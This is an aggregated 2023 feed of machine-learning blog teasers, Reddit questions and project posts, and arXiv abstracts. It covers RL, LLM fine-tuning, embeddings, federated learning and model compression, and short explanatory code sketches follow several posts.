    I recently ran across a paper on typesetting rare Chinese characters. From the abstract: Written Chinese has tens of thousands of characters. But most available fonts contain only around 6 to 12 thousand common characters that can meet the needs of everyday users. However, in publications and information exchange in many professional fields, a number […] How rare is it to encounter a rare word? first appeared on John D. Cook.  ( 5 min )
    How an LLM might leak medical data
    Machine learning models occasionally memorize training data. Under the right prompt, a model could return portions of the training data verbatim. If a large language model is trained on deidentified medical data, along with data that overlaps with the medical data, it could potentially leak details of a person’s medical history. I’m not saying that […] How an LLM might leak medical data first appeared on John D. Cook.  ( 5 min )
    "Evaluating Superhuman Models with Consistency Checks", Fluri et al 2023
    submitted by /u/gwern [link] [comments]  ( 8 min )
    Looking to get into RL, already working in CV.
    I'm in my final year of undergrad and have some previous experience with image segmentation, object detection, etc. RL is something I feel like I want to get into, but I want to understand how I can get started and what it actually involves. Also, whether there's any way I can apply my new knowledge to the domain of 3D vision, like SLAM or 3D reconstruction. submitted by /u/PRAY_J [link] [comments]  ( 8 min )
    2D Drone RL
    Long-time lurker on the sub; I just finished my first semi-decent experiment with DRL, so I thought I'd share it here. I've been wanting to experiment with RL and drones for a while now, ever since seeing John Buffer's Autodrone project, where they train a drone using a genetic algorithm. I finally got a basic implementation working using SAC a few days ago, and have made the environment open source as well in case others want to try it out. Project Link: https://github.com/Yyassin/senza submitted by /u/vanishedoblivion [link] [comments]  ( 9 min )
    Book Preview: Neuro Symbolic Reasoning and Learning
    submitted by /u/Neurosymbolic [link] [comments]  ( 8 min )
    Meme Review By AI: Bing Gets Humorous
    submitted by /u/Small_Championship_2 [link] [comments]  ( 8 min )

    AI tool to edit .ai files text
    I am looking for a tool with which I can edit text in a .ai file, replacing it with new text that uses the same font and centers the text. Of course this can be done in Photoshop or other tools like Canva; I'm just not sure if something new is available. Also, for those that use Midjourney and want to add text to an image, what tool do you use? submitted by /u/tequiladrinker1 [link] [comments]  ( 8 min )
    Computer chip with built-in human brain tissue gets military funding
    submitted by /u/surfer808 [link] [comments]  ( 8 min )
    [Discussion] I have a theory that ChatGPT is becoming dumber because more of the internet is made up of AI generated content since it awakened
    As NLP hype becomes more prevalent, we would expect a (probably exponentially) increasing amount of scraped data sources to become filled with AI-generated stuff, no? Then wouldn't AI be trained on this data without necessarily having a 'critical thinking' module to check its work? Not just ChatGPT-generated quality either, but also lesser AI companies making cheap ad-ware and upvote bots. I wonder if ChatGPT et al. could have a 'quality sensor' module that does what I do on Reddit: run sentiment analysis on the most upvoted comments to see whether the article/answer/assertion is full of shit. Not foolproof, but short of actual critical reasoning, it seems like a good start. Feels like we may soon enter an arms race where AIs need to detect AI-generated content in order to ensure their own quality. submitted by /u/Yamochao [link] [comments]  ( 9 min )
    Best AI for business/social media account name generation?
    I'm looking for something that can generate names using real words, like ConnectHub, but also made-up names, like Intrium. I tried ChatGPT but the names it gave me were not good, and it kept repeating them (but I am a noob, so). submitted by /u/anysuggestionwelcome [link] [comments]  ( 8 min )
    Bing AI Arrogance and sentiment
    submitted by /u/Yha_Boiii [link] [comments]  ( 8 min )
    What's this AI voice called?
    https://www.facebook.com/reel/264992922832459?mibextid=6gvBvW&s=yWDuG2&fs=e https://www.facebook.com/reel/1647205912442042?mibextid=6gvBvW&s=yWDuG2&fs=e He sounds very human, but after seeing him on many reels from different accounts about different topics, I am convinced this is an AI. submitted by /u/Standard_Turnover_14 [link] [comments]  ( 8 min )
    Can anyone recommend a book to get up to speed with AI?
    AI is something I just can't wrap my head around, and I see no other option than to actually read up on the subject. Ad-laden YouTube videos with annoying music just ain't cutting it. I want to know the raw mechanics, but I'm looking for something without too much abstract theory. This can't be avoided, of course, but I'd prefer it garnished with something more practical and concrete, like "this is how Stable Diffusion creates a picture of a rabbit." submitted by /u/Legitimate-Record951 [link] [comments]  ( 8 min )
    Don't do this - Torture AI with absolute silence [On phone call]
    submitted by /u/harvard1932 [link] [comments]  ( 8 min )
    One-Minute Daily AI News 7/21/2023
    Representatives from Amazon, Anthropic, Google, Inflection, Meta, Microsoft, and OpenAI have committed to managing risks posed by the tech, the White House has said.[1] Hundreds of dental offices across the U.S. are now using AI-powered X-ray imaging technology from Boston-based VideaHealth. The software helps dentists deal with routine procedures, such as identifying cavities, as well as spot more serious conditions, including periodontal disease, or bone loss within the mouth often linked with diseases like diabetes or Alzheimer's.[2] Surveillance software that uses artificial intelligence to spot people evading fares has been quietly rolled out to some of New York City’s subway stations and is poised to be introduced to more by the end of the year, according to public documents and government contracts obtained by NBC News.[3] Christopher Nolan: ‘Very strong parallels’ between Oppenheimer and scientists worried about AI.[4] Sources: [1] https://www.bbc.com/news/technology-66271429.amp [2] https://www.cbsnews.com/amp/news/ai-artificial-intelligence-dentists-health-care/ [3] https://www.nbcnews.com/news/amp/rcna93045 [4] https://amp.theguardian.com/technology/2023/jul/21/christopher-nolan-says-ai-experts-face-their-oppenheimer-moment submitted by /u/Excellent-Target-847 [link] [comments]  ( 9 min )
    Crafting a Simple "Zero-Shot Classifier" Using an API - Seeking Your Insights!
    (X-post from /r/ChatGPT) I'm hoping you fine folks might be able to give me some guidance. I have a collection of 700 categories, all potential classifications for articles. My current need is to create a system that can dynamically categorize short texts or articles according to these 700 categories. I've been experimenting with a rudimentary approach using ChatGPT to read the categories from a PDF via a plugin. The process is quite straightforward - I input the title and the first two lines of an article, and ChatGPT does a fairly decent job of predicting the most fitting category. The downside? I'm concerned about its scalability and economic viability. The current method might not work so well when we're talking about classifying a significant number of articles. My question to you, my fellow AI enthusiasts: How would you approach designing a system, via an API, capable of doing this quickly and on a large scale? I'm particularly curious about how to integrate my method with ChatGPT using OpenAI's API. Is there a feature that allows the Large Language Model (LLM) to retain the list of 700 categories in its memory so that I don't have to pass it every time? I'm aware that the billing structure is token-based, so it would be ideal to submit the categories once (or as few times as possible) and then pose a simple query like: "Categorize this article based on the categories I previously gave you. Article title: 'Barbie vs Oppenheimer: Which Movie Will Garner Greater Success?'" Ideally, I'd want this system to be persistently active and capable of processing countless queries over an extended period, say a month or a year. So, any ideas on how to design such a system? There are undoubtedly numerous routes to take. I'm really just seeking some initial direction so that I can dive deeper into research on my own. Thanks in advance for any insights you might provide! submitted by /u/adv4nced [link] [comments]  ( 9 min )
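One caveat worth noting: the chat completions API is stateless, so there is no built-in way to have the model "retain" the 700 categories between calls — the list (or a compressed version of it) is resent, and billed, with each request, which is one reason an embeddings-based classifier is usually cheaper at this scale. A hedged plain-Python sketch of assembling such a request (category names and prompt wording are illustrative; no API call is made here):

```python
CATEGORIES = ["Movies", "Finance", "Sports"]  # stand-in for the real 700

def build_messages(title, snippet):
    """Build a chat request for one article. Because the API keeps no
    memory between calls, the category list must travel inside every
    request -- its tokens are paid for on each classification."""
    system = ("Classify the article into exactly one of these categories: "
              + ", ".join(CATEGORIES) + ". Reply with the category name only.")
    return [
        {"role": "system", "content": system},
        {"role": "user", "content": f"Title: {title}\n{snippet}"},
    ]

msgs = build_messages("Barbie vs Oppenheimer", "Which movie will garner greater success?")
```

At scale, an alternative worth researching is embedding the 700 category names once, embedding each article, and picking the nearest category by cosine similarity — that moves the per-article cost from ~700 category tokens down to one embedding call.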
    Best Dataset for AI Vocals?
    As time goes on, things get improved. So far I've heard about RVC, so-vits-svc, and diff-svc; are any of these any good for AI singing/rapping? I'm not sure which one to pick. I'm open to other suggestions. submitted by /u/Office_Flashy [link] [comments]  ( 8 min )
    [R] TEXT2TEX — text-driven texture synthesis via diffusion models
    submitted by /u/SpatialComputing [link] [comments]  ( 8 min )
    [D] Breaking Down the Hyperbolic Buzz: An In-Depth Review of the 'Leaked' GPT-4 Architecture & a Mixture of Experts Literature Review with Code
    submitted by /u/CkmCpvis [link] [comments]  ( 8 min )
    [P] What are some good projects for people learning TensorFlow?
    I am learning TensorFlow and of course I want to improve my skills and add it to my resume. What projects should I build that I can add to my resume and that will later help me land a job? Projects could range from beginner to advanced and cover each major topic, from regression (linear and non-linear) to classification (binary, multi-class, multi-label), CNNs, RNNs, NLP, etc. (can add more). This could also help other people learning TensorFlow. Thank you. submitted by /u/dusklordtrue [link] [comments]  ( 9 min )
    When to train LLM supervised vs unsupervised? [D]
    I have done a bit of language modeling recently, and I am a bit confused about when to use which method. For causal language modeling, I used the unsupervised method of concatenating and chunking the text, then predicting the next word. For sequence-to-sequence tasks like summarization, I fine-tuned using the supervised method where the desired output text was the label. However, I have not seen any definitive guide on when to use supervised and when to use unsupervised training. What are the general use cases and advantages/disadvantages of each? submitted by /u/jankybiz [link] [comments]  ( 9 min )
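The concatenate-and-chunk preprocessing described above can be sketched as follows (a plain-Python illustration with toy token IDs; real pipelines do the same over a tokenized corpus):

```python
def chunk_for_clm(token_ids, block_size):
    """Concatenate-and-chunk preprocessing for causal LM training: split a
    token stream into fixed-size blocks and drop the ragged remainder.
    Labels are the inputs shifted by one (next-token prediction) -- this is
    what makes the setup 'unsupervised': the text supervises itself."""
    n_blocks = len(token_ids) // block_size
    blocks = [token_ids[i * block_size:(i + 1) * block_size] for i in range(n_blocks)]
    # inputs predict the next token: labels[t] = inputs[t + 1]
    return [(b[:-1], b[1:]) for b in blocks]

examples = chunk_for_clm(list(range(10)), block_size=4)
print(examples)  # → [([0, 1, 2], [1, 2, 3]), ([4, 5, 6], [5, 6, 7])]
```

In the seq2seq case, by contrast, the label is a separate human-written target (the summary), which is why that setting needs a labeled dataset.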
    [Discussion] Best Image Annotation Tool for Angiograms?
    I am looking to annotate specific anatomical structures using a library of angiogram images. My goal is to train AI to recognize anatomical variants of interest. What would be the best Image Annotation Tool to do this? I am new to this, so I hope that question makes sense. Any insights and advice would be greatly appreciated. submitted by /u/ColdChampion [link] [comments]  ( 8 min )
    [D] What leaderboard would correspond best to seeing what images are most similar to a caption (like CLIP)?
    I've been using CLIP to see if images align with a certain caption for image mining (ex. I embed the caption "Picture of a mountain" and then look at what image embeddings have the highest cosine similarity with that caption embedding). I was hoping to improve the performance by using a more recent model. Would I be able to use VQA models for this (like from this leaderboard) or is there a better task that aligns with seeing if images are similar to a given caption? Thank you! submitted by /u/EricW_CS [link] [comments]  ( 9 min )
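The ranking step described above — cosine similarity between a caption embedding and many image embeddings — works the same regardless of which model produces the vectors. A plain-Python sketch with toy vectors standing in for real CLIP embeddings:

```python
import math

def cosine(u, v):
    """Cosine similarity between two embedding vectors."""
    dot = sum(a * b for a, b in zip(u, v))
    return dot / (math.sqrt(sum(a * a for a in u)) * math.sqrt(sum(b * b for b in v)))

def rank_images(caption_emb, image_embs):
    """Return image indices sorted by similarity to the caption, best first."""
    return sorted(range(len(image_embs)),
                  key=lambda i: cosine(caption_emb, image_embs[i]), reverse=True)

caption = [1.0, 0.0, 1.0]                                  # toy caption embedding
images = [[0.9, 0.1, 1.1], [0.0, 1.0, 0.0], [1.0, 0.0, 0.9]]  # toy image embeddings
print(rank_images(caption, images))  # → [2, 0, 1]
```

Swapping in a newer model only changes how the vectors are produced; any dual-encoder image-text model that embeds captions and images into a shared space can be dropped into this loop.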
    [P] Pattern classification using CNNs
    Hi (I have to write again, Reddit removed image attached), Does anyone has experience with training CNN for pattern matching? Here is the sample of the images which I have on my disposal. It is graphical representation of input data which for problem classified by algorithm which shows best performance when applied. Lines are projection of the problem of input data on 2d plain, so shapes and colours have meaning in correlating input data to solution (i.e) algorithm. Whichever CNN architecture I use, starting from VGG16 and so on, I am unable to achieve higher validation accuracy then 0.7 when execute training. I am constantly under-fitting. I have 10k, 100k, 200k data samples on my disposal - nothing helps. Is CNN able to make any sense of images/patterns given below? Is this something that CNN can not do or I am missing something? Thanks! Patterns to classify ​ submitted by /u/thecelavi [link] [comments]  ( 9 min )
    [D] technical question: How is it possible that embedding models produce fixed size vectors for sentences with varying lengths?
As far as I know and have studied, each token is mapped from the high-dimensional discrete token space into a continuous, lower-dimensional space where words are embedded meaningfully based on their relationships in the training data. So a 1000-token text produces 1000 vectors. Now for vector databases (correct me if I'm wrong), people are storing fixed-size vectors for texts of varying lengths. For example, take two sentences, one with 1000 tokens and the other with 10 tokens: each produces one vector, and both vectors have the same size. I'd really appreciate an explanation. submitted by /u/Qdr-91 [link] [comments]  ( 9 min )
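The usual answer is pooling: sentence-embedding models collapse the per-token vectors into a single fixed-size vector, most simply by averaging them (mean pooling) or by taking one special token's vector (e.g. [CLS]). A minimal sketch of mean pooling, assuming the token vectors are already computed (toy values here):

```python
def mean_pool(token_vectors):
    # Average the token vectors dimension-wise: the result's size is the
    # embedding dimension, independent of how many tokens went in.
    dim = len(token_vectors[0])
    n = len(token_vectors)
    return [sum(v[d] for v in token_vectors) / n for d in range(dim)]

short_text = [[1.0, 2.0], [3.0, 4.0]]   # 2 "token embeddings" (toy values)
long_text = [[1.0, 0.0]] * 10           # 10 tokens, same embedding dimension
assert len(mean_pool(short_text)) == len(mean_pool(long_text)) == 2
print(mean_pool(short_text))  # [2.0, 3.0]
```

Models like Sentence-BERT are trained so that this pooled vector is itself meaningful for similarity, and that single vector per text is what vector databases store.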
    [P] Llama-2 4bit fine-tune with dolly-15k on Colab (Free)
Simple walkthrough of fine-tuning the Llama-2 model (instruction fine-tuned on Guanaco) with 4-bit QLoRA on a free Google Colab instance. Colab: https://colab.research.google.com/drive/134o_cXcMe_lsvl15ZE_4Y75Kstepsntu?usp=sharing GitHub: https://github.com/kw2828/guardrail-ml/blob/main/examples YouTube Overview: https://www.youtube.com/watch?v=o5bU1H-6TqM&ab_channel=GenerativeAIEntrepreneurs Bonus: a Colab in the repo above on generating your own JSON Q&A dataset from a PDF. submitted by /u/Educational_Grass_38 [link] [comments]  ( 8 min )
    [N] Jul 2023 - Recent Instruction/Chat-Based LLMs and their parents (after llama2)
    submitted by /u/michaelthwan_ai [link] [comments]  ( 8 min )
[Discussion] What do you think about Federated Learning for Healthcare
Link to the article: https://dl.acm.org/doi/10.1145/3533708 In this article, they discuss the difficulty of training foundation models on healthcare data because of how sensitive and hard to obtain it is. Access to a large amount of high-quality medical data is possibly the most crucial factor for enhancing Machine Learning (ML) applications in the healthcare domain. However, security and privacy issues of healthcare data have raised broad ethical and legal concerns in recent years, given the sensitive nature of health information. So they take the approach of Federated Learning, where the model is distributed and trained by multiple institutions (hospitals, clinics, ...); only the model weights are transferred back to the general model to be updated, which keeps the sensitive medical data safely inside the institutions. The global ML model is distributed to each client site, where an instance is trained locally. The updates from locally trained instances are then aggregated at regular intervals to improve the global model. The updated global model is then sent back to the local sites, where the learning continues. These steps are repeated until a particular convergence threshold is satisfied, or they continue indefinitely to keep improving the model. What do you think about such an approach to breaking down data barriers between AI and the healthcare industry? submitted by /u/angeloboustany [link] [comments]  ( 9 min )
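The aggregation step described above is essentially FedAvg: a size-weighted average of the locally trained parameters. A minimal sketch with flat weight lists and hypothetical client dataset sizes:

```python
def fedavg(client_weights, client_sizes):
    # FedAvg aggregation: average each parameter across clients, weighted by
    # each client's local dataset size. Weights are flat float lists here.
    total = sum(client_sizes)
    n_params = len(client_weights[0])
    return [
        sum(w[i] * s for w, s in zip(client_weights, client_sizes)) / total
        for i in range(n_params)
    ]

# Two hypothetical hospitals; the one with more local data counts more.
hospital_a, hospital_b = [0.0, 1.0], [1.0, 0.0]
print(fedavg([hospital_a, hospital_b], [100, 300]))  # [0.75, 0.25]
```

Only these averaged weights ever leave a site; the patient records used to compute them stay local.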
    [D] Scheduler choice when pretraining causal decoder models
There seems to be a lack of published work on the impact of schedulers on training effectiveness for models similar to the GPT family. I'm looking at a very domain-specific setting: pretraining a model from scratch on a relatively small dataset (~40B tokens) over multiple epochs. To date we've had some mixed results with a linear scheduler with warmup to help with stability. Any thoughts on whether a cyclic-based scheduler or another choice could help? submitted by /u/Humble-Passenger-635 [link] [comments]  ( 9 min )
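For reference, the two most common choices can be written down in a few lines: linear warmup followed by linear decay (what the post describes) and warmup followed by cosine decay (the usual alternative for GPT-style pretraining). A sketch of both, with made-up hyperparameters:

```python
import math

def linear_schedule_with_warmup(step, warmup_steps, total_steps, base_lr):
    # Linear warmup from 0 to base_lr, then linear decay back to 0.
    if step < warmup_steps:
        return base_lr * step / warmup_steps
    remaining = max(total_steps - step, 0)
    return base_lr * remaining / (total_steps - warmup_steps)

def cosine_with_warmup(step, warmup_steps, total_steps, base_lr):
    # Same warmup, then cosine decay to 0; often preferred for multi-epoch runs.
    if step < warmup_steps:
        return base_lr * step / warmup_steps
    progress = (step - warmup_steps) / (total_steps - warmup_steps)
    return base_lr * 0.5 * (1.0 + math.cos(math.pi * min(progress, 1.0)))

# Hypothetical numbers: 10 warmup steps out of 100 total, peak LR 1e-3.
for s in (0, 5, 10, 55, 100):
    print(s, linear_schedule_with_warmup(s, 10, 100, 1e-3),
          cosine_with_warmup(s, 10, 100, 1e-3))
```

Cyclic schedules restart this decay curve several times per run; whether that helps on a small multi-epoch corpus is exactly the open question in the post.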
    Train LLM for closed-book QA [D]
What is the best way to train an LLM for closed-book question answering? I can only think of two options: (1) concatenate question/answer pairs into chunked text and train the model using causal language modeling, or (2) train the model using sequence-to-sequence techniques with the question as the input and the answer as the label. I have tried both, and the first seems to work better. Does anyone know whether there is a commonly accepted method? Can somebody point me to some resources? submitted by /u/jankybiz [link] [comments]  ( 9 min )
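The first option above amounts to a formatting choice before ordinary causal LM training. A minimal sketch; the "Question:/Answer:" template is an illustrative assumption, not a standard, and any consistent format works:

```python
def format_qa_for_causal_lm(pairs, sep="\n\n"):
    # Concatenate Q/A pairs into one plain-text training document; a
    # decoder-only model then trains on it with the ordinary causal LM loss.
    return sep.join(f"Question: {q}\nAnswer: {a}" for q, a in pairs)

text = format_qa_for_causal_lm([("What is 2+2?", "4"),
                                ("Capital of France?", "Paris")])
print(text)
```

The resulting text is then tokenized and chunked like any other pretraining corpus, which is why no seq2seq machinery is needed.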
    [P] A Chrome extension to save paper details
    submitted by /u/HugoDzz [link] [comments]  ( 8 min )
    [Discussion] Easy way to ship tensorflow model to non-technical audience?
    I'm surprised that there aren't more resources on the internet about how to do this, it seems like the whole point of doing machine learning lol. Do very few people have this need? All of the solutions for this that I've found so far seem to require advanced knowledge of web development/backend engineering. I'd love to hear if someone has found or figured out a way to do this. submitted by /u/youaregames [link] [comments]  ( 9 min )
    Can someone explain to me what the wolves and prey really are in wolf search algorithm?[D]
I'm aware that the algorithm is very similar to the real-world hunting of wolves, but what I want to know is what exactly the "prey" is and what a "wolf" is. For example, I know a chromosome sequence in a Genetic Algorithm is a combination of random features, and its fitness can be computed. Then you let the whole natural-selection process take place and you arrive at an optimized chromosome, the solution to the optimization problem. I just can't seem to wrap my head around the WSA algorithm. I've watched a bunch of YouTube videos and I tried reading the paper, but I still can't understand it well. What IS a wolf? I think what I'm looking for is how the actual data features and components of a search algorithm correlate with the analogy of the wolves searching for prey. submitted by /u/SnooHobbies7910 [link] [comments]  ( 9 min )
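One way to read the analogy: each wolf is a candidate solution, a point in the search space (the counterpart of a GA chromosome), and the "prey" is whatever nearby position has better fitness; a wolf senses and moves toward it within its visual radius, with occasional random escape jumps to avoid local traps. A toy sketch of that reading (not the exact update rules from the WSA paper):

```python
import random

def wolf_search(fitness, dim, n_wolves=5, steps=50, visual=0.5, escape_p=0.1):
    # Each "wolf" is a candidate solution; the "prey" is any better nearby
    # position. This is an illustrative sketch of the analogy only.
    random.seed(0)
    wolves = [[random.uniform(-5, 5) for _ in range(dim)] for _ in range(n_wolves)]
    best = min(wolves, key=fitness)[:]
    for _ in range(steps):
        for w in wolves:
            # "Hunt": probe a random point within visual range; move if better.
            probe = [x + random.uniform(-visual, visual) for x in w]
            if fitness(probe) < fitness(w):
                w[:] = probe
            if fitness(w) < fitness(best):
                best = w[:]
            # "Escape": small chance of a random jump away from a local trap.
            if random.random() < escape_p:
                w[:] = [x + random.uniform(-2, 2) for x in w]
    return best

# Minimize the 2D sphere function; wolves drift toward the origin.
best = wolf_search(lambda p: sum(x * x for x in p), dim=2)
print(best)
```

So in WSA the fitness function plays the same role as in a GA; only the move operators (hunt/escape) replace crossover and mutation.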
    [D] What are your main approach to model compression in production?
I’m currently trying to understand each method, but it seems I can never catch up to the latest/best. After months of reading I still have lots of questions, like: What are the go-to strategies to compress a model? Are there any good fully/semi-automated frameworks? How much weight does model architecture carry in this equation? What could be a good general workflow in a modern, optimized solution? I would love to hear about some production-compliant workflows. submitted by /u/PierroZ-PLKG [link] [comments]  ( 9 min )
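As one concrete starting point among the compression strategies being asked about, post-training quantization is usually the cheapest win. A toy sketch of symmetric int8 quantization of a weight list (real frameworks do this per-tensor or per-channel, often with calibration data):

```python
def quantize_int8(weights):
    # Symmetric quantization: one scale maps the largest-magnitude weight
    # to +/-127; every float weight becomes a small integer.
    scale = max(abs(w) for w in weights) / 127 or 1.0
    return [round(w / scale) for w in weights], scale

def dequantize(q, scale):
    return [x * scale for x in q]

w = [0.5, -1.27, 0.0, 1.0]
q, s = quantize_int8(w)
print(q)                 # integers in [-127, 127], 4x smaller than float32
print(dequantize(q, s))  # approximately recovers w
```

Pruning and distillation are the other two standard pillars; in practice production pipelines combine them and measure the accuracy/latency trade-off per model.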
    [D] Challenges and Applications of Large Language Models
    submitted by /u/gamerx88 [link] [comments]  ( 8 min )
    Using stable baseline3 for multi agent env
    Hey, I am trying to use sb3 with a pettingzoo mpe environment and trying to implement parameter sharing for simple spread. Any help on how I would train a model for this multi agent environment would be appreciated, thanks. submitted by /u/bruhhhwhats [link] [comments]  ( 8 min )
    The Offline Algorithm (or how to get >40,000 avg. in Humanoid-v2 in 10000 ep and highest scores (Wordly) in other envs without multiprocessing)
I've been doing this "fine tuning" project for 2 years now, since 2021. https://preview.redd.it/qviy5lpxegdb1.png?width=568&format=png&auto=webp&s=8728814e39176d9024fac16e191937aeb5a302c1 https://github.com/timgep/Lords_Policy_Gradient/tree/main This is an Offline Reinforcement Learning algorithm based on Twin Delayed DDPG (Temporal Difference), Fading Memories (a fading replay buffer), a Spiking Activation Function (an alternative to ReLU and Norm), and Rectified Huber Error (an alternative to MSE and MAE); the last 3 were invented/implemented during experiments. For a long time I was reluctant to use TD3, as it seemed that using a second critic when you already have 2 Actors and 2 Critics in DDPG was not normal. As a result you would have 6 networks. So I was making my own DDPG with decreased (smaller)…  ( 14 min )
    Communication-Efficient Split Learning via Adaptive Feature-Wise Compression. (arXiv:2307.10805v1 [cs.DC])
This paper proposes a novel communication-efficient split learning (SL) framework, named SplitFC, which reduces the communication overhead required for transmitting intermediate feature and gradient vectors during the SL training process. The key idea of SplitFC is to leverage the different dispersion degrees exhibited in the columns of the matrices. SplitFC incorporates two compression strategies: (i) adaptive feature-wise dropout and (ii) adaptive feature-wise quantization. In the first strategy, the intermediate feature vectors are dropped with adaptive dropout probabilities determined based on the standard deviation of these vectors. Then, by the chain rule, the intermediate gradient vectors associated with the dropped feature vectors are also dropped. In the second strategy, the non-dropped intermediate feature and gradient vectors are quantized using adaptive quantization levels determined based on the ranges of the vectors. To minimize the quantization error, the optimal quantization levels of this strategy are derived in a closed-form expression. Simulation results on the MNIST, CIFAR-10, and CelebA datasets demonstrate that SplitFC provides more than a 5.6% increase in classification accuracy compared to state-of-the-art SL frameworks, while requiring 320 times less communication overhead than the vanilla SL framework without compression.  ( 2 min )
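As a toy illustration of the first strategy, dropping low-dispersion feature columns with higher probability might look like this (a simple inverse-std heuristic for the drop probabilities, not the paper's actual formula):

```python
import random
import statistics

def adaptive_feature_dropout(columns, base_rate=0.5, seed=0):
    # Illustrative sketch only: columns of the intermediate feature matrix
    # with higher dispersion (standard deviation) are kept more often, while
    # low-variance columns are dropped with higher probability, shrinking
    # what must be transmitted between the split halves of the model.
    rng = random.Random(seed)
    stds = [statistics.pstdev(col) for col in columns]
    max_std = max(stds) or 1.0
    kept = []
    for col, s in zip(columns, stds):
        drop_p = base_rate * (1.0 - s / max_std)  # low std -> higher drop chance
        kept.append(None if rng.random() < drop_p else col)
    return kept

cols = [[0.0, 10.0, 0.0, 10.0], [5.0, 5.0, 5.0, 5.0]]
result = adaptive_feature_dropout(cols)
print(result)  # the high-variance first column is always kept (drop_p = 0)
```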
    Navya3DSeg -- Navya 3D Semantic Segmentation Dataset & split generation for autonomous vehicles. (arXiv:2302.08292v3 [cs.CV] UPDATED)
    Autonomous driving (AD) perception today relies heavily on deep learning based architectures requiring large scale annotated datasets with their associated costs for curation and annotation. The 3D semantic data are useful for core perception tasks such as obstacle detection and ego-vehicle localization. We propose a new dataset, Navya 3D Segmentation (Navya3DSeg), with a diverse label space corresponding to a large scale production grade operational domain, including rural, urban, industrial sites and universities from 13 countries. It contains 23 labeled sequences and 25 supplementary sequences without labels, designed to explore self-supervised and semi-supervised semantic segmentation benchmarks on point clouds. We also propose a novel method for sequential dataset split generation based on iterative multi-label stratification, and demonstrated to achieve a +1.2% mIoU improvement over the original split proposed by SemanticKITTI dataset. A complete benchmark for semantic segmentation task was performed, with state of the art methods. Finally, we demonstrate an Active Learning (AL) based dataset distillation framework. We introduce a novel heuristic-free sampling method called ego-pose distance based sampling in the context of AL. A detailed presentation on the dataset is available here https://www.youtube.com/watch?v=5m6ALIs-s20.  ( 2 min )
    ForecastTKGQuestions: A Benchmark for Temporal Question Answering and Forecasting over Temporal Knowledge Graphs. (arXiv:2208.06501v2 [cs.AI] UPDATED)
    Question answering over temporal knowledge graphs (TKGQA) has recently found increasing interest. TKGQA requires temporal reasoning techniques to extract the relevant information from temporal knowledge bases. The only existing TKGQA dataset, i.e., CronQuestions, consists of temporal questions based on the facts from a fixed time period, where a temporal knowledge graph (TKG) spanning the same period can be fully used for answer inference, allowing the TKGQA models to use even the future knowledge to answer the questions based on the past facts. In real-world scenarios, however, it is also common that given the knowledge until now, we wish the TKGQA systems to answer the questions asking about the future. As humans constantly seek plans for the future, building TKGQA systems for answering such forecasting questions is important. Nevertheless, this has still been unexplored in previous research. In this paper, we propose a novel task: forecasting question answering over temporal knowledge graphs. We also propose a large-scale TKGQA benchmark dataset, i.e., ForecastTKGQuestions, for this task. It includes three types of questions, i.e., entity prediction, yes-no, and fact reasoning questions. For every forecasting question in our dataset, QA models can only have access to the TKG information before the timestamp annotated in the given question for answer inference. We find that the state-of-the-art TKGQA methods perform poorly on forecasting questions, and they are unable to answer yes-no questions and fact reasoning questions. To this end, we propose ForecastTKGQA, a TKGQA model that employs a TKG forecasting module for future inference, to answer all three types of questions. Experimental results show that ForecastTKGQA outperforms recent TKGQA methods on the entity prediction questions, and it also shows great effectiveness in answering the other two types of questions.  ( 3 min )
    High-order Tensor Pooling with Attention for Action Recognition. (arXiv:2110.05216v2 [cs.CV] UPDATED)
    We aim at capturing high-order statistics of feature vectors formed by a neural network, and propose end-to-end second- and higher-order pooling to form a tensor descriptor. Tensor descriptors require a robust similarity measure due to low numbers of aggregated vectors and the burstiness phenomenon, when a given feature appears more/less frequently than statistically expected. The Heat Diffusion Process (HDP) on a graph Laplacian is closely related to the Eigenvalue Power Normalization (EPN) of the covariance/auto-correlation matrix, whose inverse forms a loopy graph Laplacian. We show that the HDP and the EPN play the same role, i.e., to boost or dampen the magnitude of the eigenspectrum thus preventing the burstiness. We equip higher-order tensors with EPN which acts as a spectral detector of higher-order occurrences to prevent burstiness. We also prove that for a tensor of order r built from d dimensional feature descriptors, such a detector gives the likelihood if at least one higher-order occurrence is 'projected' into one of binom(d,r) subspaces represented by the tensor; thus forming a tensor power normalization metric endowed with binom(d,r) such 'detectors'. For experimental contributions, we apply several second- and higher-order pooling variants to action recognition, provide previously not presented comparisons of such pooling variants, and show state-of-the-art results on HMDB-51, YUP++ and MPII Cooking Activities.  ( 3 min )
    Gaussian Process Priors for Systems of Linear Partial Differential Equations with Constant Coefficients. (arXiv:2212.14319v3 [stat.ML] UPDATED)
    Partial differential equations (PDEs) are important tools to model physical systems and including them into machine learning models is an important way of incorporating physical knowledge. Given any system of linear PDEs with constant coefficients, we propose a family of Gaussian process (GP) priors, which we call EPGP, such that all realizations are exact solutions of this system. We apply the Ehrenpreis-Palamodov fundamental principle, which works as a non-linear Fourier transform, to construct GP kernels mirroring standard spectral methods for GPs. Our approach can infer probable solutions of linear PDE systems from any data such as noisy measurements, or pointwise defined initial and boundary conditions. Constructing EPGP-priors is algorithmic, generally applicable, and comes with a sparse version (S-EPGP) that learns the relevant spectral frequencies and works better for big data sets. We demonstrate our approach on three families of systems of PDEs, the heat equation, wave equation, and Maxwell's equations, where we improve upon the state of the art in computation time and precision, in some experiments by several orders of magnitude.  ( 3 min )
    Multi-view self-supervised learning for multivariate variable-channel time series. (arXiv:2307.09614v2 [stat.ML] UPDATED)
    Labeling of multivariate biomedical time series data is a laborious and expensive process. Self-supervised contrastive learning alleviates the need for large, labeled datasets through pretraining on unlabeled data. However, for multivariate time series data, the set of input channels often varies between applications, and most existing work does not allow for transfer between datasets with different sets of input channels. We propose learning one encoder to operate on all input channels individually. We then use a message passing neural network to extract a single representation across channels. We demonstrate the potential of this method by pretraining our model on a dataset with six EEG channels and then fine-tuning it on a dataset with two different EEG channels. We compare models with and without the message passing neural network across different contrastive loss functions. We show that our method, combined with the TS2Vec loss, outperforms all other methods in most settings.  ( 2 min )
    MaxViT-UNet: Multi-Axis Attention for Medical Image Segmentation. (arXiv:2305.08396v3 [eess.IV] UPDATED)
